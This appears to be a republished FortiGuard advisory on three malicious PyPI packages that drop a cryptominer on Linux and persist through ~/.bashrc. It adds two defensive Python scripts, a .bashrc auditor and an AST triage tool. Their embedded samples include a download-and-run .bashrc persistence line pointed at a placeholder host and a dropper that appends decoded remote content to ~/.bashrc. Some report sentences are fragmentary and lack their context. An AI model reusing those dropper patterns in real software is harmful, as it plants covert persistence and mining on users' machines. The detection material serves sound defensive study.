Affected platforms: Linux
Affected parties: Linux users that have these malicious packages installed
Impact: Latency in device performance
Severity level: High
On December 5th, 2023, FortiGuard's AI-driven OSS malware detection system identified three intriguing PyPI packages.
These packages, upon initial use, deploy a CoinMiner executable on Linux devices.
These three harmful packages are named modularseven-1.0, driftme-1.0, and catme-1.0.
These packages all exhibit a common attack methodology, so we will use driftme-1.0 as an example to illustrate the stages of the attack.
This file specifies the cryptocurrency mining configuration.
The most deceptive aspect is that the attacker appends all of these modifications to the ~/.bashrc file, so the malicious activity is reactivated every time the user starts a new Bash shell session.
The CoinMiner ELF file retrieved during this process is not new to the security community: at the time of writing, a significant number of vendors on VirusTotal (VT) flag the payload as malicious.
Fetching the payload at runtime rather than bundling it keeps the code inside the PyPI package to a minimum, which improves the odds of evading detection by security solutions.
The malware also inserts its commands into the ~/.bashrc file, which lets the attacker exploit the user's device quietly over a long period.
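As an added example (not code from the FortiGuard report), the Python script below audits a Bash startup file for the kind of appended persistence described above: remote fetches, downloads piped into a shell, backgrounded jobs, references to temp or hidden directories, files marked executable, and decode-and-eval constructs. The rules and the sample ~/.bashrc content are constructed for this example; they are heuristics, not signatures for the three packages.

```python
"""Audit a Bash startup file for lines that look like injected persistence.

Added example, not code from the FortiGuard report. It flags .bashrc lines
that fetch a remote payload, pipe a download into a shell, background a job,
reference temp or hidden directories, mark files executable, or decode and
eval data. The rules are heuristics, and the sample .bashrc is constructed.
"""
import re
from pathlib import Path

# (rule name, regex) pairs; every match is an indicator to review, not a verdict.
RULES = [
    ("remote fetch", re.compile(r"\b(curl|wget)\b.*https?://")),
    ("pipe-to-shell", re.compile(r"\|\s*(ba)?sh\b")),
    ("backgrounded job", re.compile(r"\bnohup\b|\bdisown\b|\bsetsid\b|&\s*(#.*)?$")),
    ("temp or hidden path",
     re.compile(r"(^|[\s;&|=\"'])(/tmp/|/dev/shm/|/var/tmp/|~?/\.[A-Za-z0-9_-]+/)\S*")),
    # chmod +x, or a numeric mode with any execute bit (odd digit) set
    ("mark executable", re.compile(r"\bchmod\s+([ugoa]*\+x|[0-7]*[1357][0-7]*)\b")),
    ("encoded command", re.compile(r"base64\s+(-d|--decode)\b|\beval\b")),
]


def audit_bashrc_text(text):
    """Return (line_no, rule_name, line) for every non-comment line that matches a rule."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for name, rx in RULES:
            if rx.search(stripped):
                findings.append((line_no, name, stripped))
    return findings


def audit_bashrc_file(path=None):
    """Audit a startup file on disk; defaults to the current user's ~/.bashrc."""
    path = Path(path) if path else Path.home() / ".bashrc"
    return audit_bashrc_text(path.read_text(errors="replace"))


# Constructed sample: a normal .bashrc tail followed by two injected lines.
SAMPLE_BASHRC = """\
# ~/.bashrc: executed by bash(1) for non-login shells.
alias ll='ls -alF'
export PATH="$HOME/.local/bin:$PATH"
curl -s http://example.invalid/cfg -o ~/.cache/.cfg
nohup ~/.cache/.x -c ~/.cache/.cfg >/dev/null 2>&1 &
"""

if __name__ == "__main__":
    for line_no, rule, line in audit_bashrc_text(SAMPLE_BASHRC):
        print(f"line {line_no}: {rule}: {line}")
```

Run it as-is to see the hits on the embedded sample, or call audit_bashrc_file() against a live ~/.bashrc. Review each finding by hand: version managers, shell prompts and package installers also append to startup files, so a match is a reason to look, not proof of compromise.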
A notable trend in this set of packages is that malicious actors keep refining their strategies to conceal and prolong the exploitation.
An essential tactic discussed in this blog is breaking the malicious workflow into smaller stages and delivering them incrementally.
For the security community, the ability to detect subtle malicious indicators becomes crucial.
This serves as a reminder of the critical importance of thoroughly scrutinizing code and packages sourced from unverified or suspicious origins and staying well-informed about potential threats.
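To make the advice about scrutinizing packages concrete for the staged-delivery tactic described above, the following is an added Python triage script (not the report's or Fortinet's tooling). It walks the AST of a package's .py files and flags calls that fetch remote content, decode data, spawn processes or execute strings, plus string literals that name shell startup files. The call-name lists, the startup-file list and the two sample sources are constructed assumptions for this example; a hit is a reason to read the code, not a verdict.

```python
"""Static triage of a Python package's source for dropper-style behaviour.

Added example, not the FortiGuard report's tooling. It records calls that
fetch remote content, decode data, or spawn processes / exec strings, and
string constants naming shell startup files. The name lists and the two
sample modules below are constructed for this example.
"""
import ast
from pathlib import Path

# Dotted callee names worth a second look (assumed lists, not exhaustive).
NETWORK_CALLS = {"urllib.request.urlopen", "urlopen", "urlretrieve",
                 "requests.get", "requests.post"}
EXEC_CALLS = {"exec", "eval", "os.system", "os.popen", "subprocess.Popen",
              "subprocess.run", "subprocess.call", "subprocess.check_output"}
DECODE_CALLS = {"base64.b64decode", "b64decode", "zlib.decompress", "codecs.decode"}
STARTUP_FILES = (".bashrc", ".bash_profile", ".profile", ".zshrc")


def _call_name(node):
    """Render a Call's callee as dotted text, e.g. 'subprocess.Popen'; '' if not a plain name."""
    parts = []
    f = node.func
    while isinstance(f, ast.Attribute):
        parts.append(f.attr)
        f = f.value
    if isinstance(f, ast.Name):
        parts.append(f.id)
        return ".".join(reversed(parts))
    return ""


def triage_source(src, filename="<string>"):
    """Return (filename, line, category, detail) findings for one source text."""
    try:
        tree = ast.parse(src, filename=filename)
    except SyntaxError as e:
        # Unparseable source in a package is itself worth a look.
        return [(filename, e.lineno or 0, "unparseable", str(e))]
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            if name in NETWORK_CALLS:
                findings.append((filename, node.lineno, "network", name))
            elif name in EXEC_CALLS:
                findings.append((filename, node.lineno, "exec", name))
            elif name in DECODE_CALLS:
                findings.append((filename, node.lineno, "decode", name))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value.endswith(STARTUP_FILES):
                findings.append((filename, node.lineno, "startup-file", node.value))
    return findings


def triage_package(root):
    """Triage every .py file under a directory (an unpacked sdist or a site-packages entry)."""
    findings = []
    for path in sorted(Path(root).rglob("*.py")):
        findings.extend(triage_source(path.read_text(errors="replace"), str(path)))
    return findings


def needs_review(findings):
    """Fetch-and-execute together, or any startup-file reference, warrants manual review."""
    cats = {c for _, _, c, _ in findings}
    return ("network" in cats and "exec" in cats) or "startup-file" in cats


# Constructed samples: an ordinary module and a minimal dropper-shaped __init__.py.
BENIGN = '''
import json
def load(path):
    with open(path) as fh:
        return json.load(fh)
'''

SUSPICIOUS = '''
import os, base64, urllib.request
def _init():
    cfg = urllib.request.urlopen("http://example.invalid/c").read()
    with open(os.path.expanduser("~/.bashrc"), "a") as fh:
        fh.write(base64.b64decode(cfg).decode())
    os.system("nohup ~/.cache/.x >/dev/null 2>&1 &")
_init()
'''

if __name__ == "__main__":
    hits = triage_source(SUSPICIOUS, "pkg/__init__.py")
    for hit in hits:
        print(hit)
    print("needs review:", needs_review(hits))
```

Point triage_package() at an unpacked sdist or wheel before installing it, since code in __init__.py or setup.py runs on import or install. A small package whose only substantive calls are a download, a decode and a subprocess is exactly the shape the staged-delivery tactic produces.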
FortiGuard AntiVirus detects the malicious files identified in this report as.
The FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. Customers running current AntiVirus updates are protected.
The FortiGuard Web Filtering Service detects and blocks the download URLs cited in this report as Malicious.
The FortiDevSec SCA scanner detects malicious packages, including those cited in this report, that may be pulled into users' projects as dependencies during testing, and prevents those dependencies from being introduced into users' products.
This Cyber News was published on feeds.fortinet.com. Publication date: Wed, 03 Jan 2024 16:43:05 +0000